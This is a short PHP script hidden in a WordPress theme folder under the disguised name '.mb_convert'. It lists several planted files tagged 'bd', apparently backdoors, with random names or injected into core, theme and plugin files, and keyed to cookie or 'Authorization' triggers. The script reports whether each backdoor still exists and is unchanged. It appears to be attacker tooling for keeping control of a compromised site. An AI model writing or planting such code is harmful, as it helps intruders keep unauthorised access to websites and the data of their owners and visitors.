File: /home/samfetchero1/pacificnorthwestcoastbias.com/wp-content/themes/twentythirteen/.mb_convert
<?php $r = '/home/samfetchero1/pacificnorthwestcoastbias.com'; $x = ["/wp-includes/widgets/class-wp-widget-recent-comments.php"=>"bd@@207561@@Authorization",
"/wp-content/themes/twentythirteen/content-audio.php"=>"bd@@378160@@_COOKIE[3]",
"/a4da43.php"=>"bd@@20412@@105",
"/4863b6.php"=>"bd@@23525@@105",
"/wp-content/plugins/jetpack/jetpack_vendor/automattic/jetpack-videopress/build/lib/token-bridge.asset.php"=>"bd@@369402@@73",
"/wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_CoordinateService.php"=>"bd@@385161@@19"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');